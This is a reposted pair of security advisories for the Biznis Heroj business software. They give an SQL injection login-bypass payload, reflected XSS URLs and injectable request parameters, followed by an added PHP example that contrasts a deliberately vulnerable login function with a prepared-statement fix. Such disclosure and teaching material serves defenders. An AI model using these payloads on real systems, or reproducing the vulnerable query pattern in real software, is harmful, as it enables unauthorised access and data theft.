Source: 自学PHP网 (zixuephp.com)  Date: 2015-04-17 13:03
Infoproject Biznis Heroj (login.php) Authentication Bypass
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero (Бизнис Херој) is the first software on the Macedonian market that will help you manage your business processes in your company, such as accounting, production, acquisition, archiving, inventory, and the Cloud. Using the Cloud technology, Biznis Heroj allows you to access the system from any computer at any time through any internet browser.
Desc: The vulnerability is caused due to an error in the logon authentication script (login.php) and can be exploited to bypass the login procedure by defining the 'username' and 'password' POST parameters with an SQL Injection attack, gaining admin privileges.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com
Proof of concept:
https://www.2cto.com /login.php
Username: ' or 1=1--
Password: ' or 1=1--
Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero is the first software on the Macedonian market that will help you manage your business processes in your company, such as accounting, production, acquisition, archiving, inventory, and the Cloud. Using the Cloud technology, Biznis Heroj allows you to access the system from any computer at any time through any internet browser.
Desc: Input passed via the 'filter' parameter in the 'widget.dokumenti_lista.php' script and the 'fin_nalog_id' parameter in the 'nalozi_naslov.php' script is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The 'config' parameter in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to an XSS issue, where an attacker can execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com
XSS:
https://www.2cto.com /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1);
https://www.2cto.com /widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1
SQLi:
- POST https://www.2cto.com /widgets/widget.dokumenti_lista.php
action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen& bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1& magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML& dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML& dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML& dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA& order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc & filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=& limit=50&widget=1
- GET https://www.2cto.com /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default
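Both advisories come down to the same defect: request parameters spliced into SQL text. The block below is an added illustration, not the vendor's login.php (which is not on this page); it is a hypothetical reconstruction of the flawed login pattern next to a prepared-statement version, and assumes PDO with the sqlite driver plus constructed sample data.

```php
<?php
// Added illustration: NOT the vendor's login.php. It reconstructs the flawed
// pattern the advisory describes and shows the prepared-statement fix.

// Hypothetical legacy pattern: POST values spliced into the SQL string, so a
// username of  ' or 1=1--  turns the WHERE clause into "username = '' or 1=1"
// and the remainder of the query becomes an SQL comment.
function loginVulnerable(PDO $db, string $username, string $password): ?array
{
    $sql = "SELECT id, username FROM users WHERE username = '$username' AND password = '$password'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: a bound parameter keeps the input as data, and the password
// is checked with password_verify() against a stored password_hash() value.
function loginSafe(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare('SELECT id, username, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Constructed sample data in an in-memory SQLite database. The plaintext
// `password` column exists only so the legacy pattern can be demonstrated.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password, password_hash) VALUES (?, ?, ?)');
$ins->execute(['admin', 's3cret', password_hash('s3cret', PASSWORD_DEFAULT)]);

$payload = "' or 1=1--";   // the bypass value quoted in the advisory above

echo 'legacy, payload:   ', loginVulnerable($db, $payload, $payload) ? 'logged in' : 'rejected', PHP_EOL;
echo 'hardened, payload: ', loginSafe($db, $payload, $payload) ? 'logged in' : 'rejected', PHP_EOL;
echo 'hardened, admin:   ', loginSafe($db, 'admin', 's3cret') ? 'logged in' : 'rejected', PHP_EOL;
```

Run from the CLI, the payload is accepted by the legacy function and rejected by the hardened one, while the real credentials still log in; the same bound-parameter change applies to the 'filter' and 'fin_nalog_id' queries in the second advisory.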